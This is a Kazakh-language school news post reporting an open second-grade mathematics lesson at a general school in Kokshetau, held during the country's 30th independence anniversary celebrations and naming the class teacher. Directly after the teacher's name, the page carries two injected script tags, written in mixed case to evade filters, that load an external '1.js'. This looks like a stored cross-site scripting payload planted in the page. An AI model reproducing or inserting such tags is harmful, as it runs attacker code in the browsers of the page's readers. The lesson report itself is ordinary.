Қазақстан Республикасының Тәуелсіздігінің 30 жылдығын мерекелеуге арналған "Бастауыш сынып оқушыларын оқытудың замануи тәсілдері" атты апталық жоспарына сәйкес "Ақмола облысы білім басқармасының Көкшетау қаласы бойынша білім бөлімі Көкшетау қаласының №7 жалпы білім беретін мектебі" КММ 2 «А» сыныбында математика пәнінен «Өткенді бекіту» тақырыбында ашық сабақ өткізілді. Сабақтың мақсаты: қосудың, көбейтудің ауыстырымдылық, терімділік қасиеттерін қолданып, тиімді есептеу жүргізуді қолдану. Сонымен қатар табиғатты қорғау туралы ақпаратпен бөлісті. Оқушылар сабаққа белсене қатысып, тапсырмаларды орындады. Сабақ соңында кері байланыс орнатылды. Бастауыш сынып мұғалімі Жусубалина Марал Мукылаевна.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

Просмотров: 414


Пікір қосу



Деректерді қолтаңбаға қосу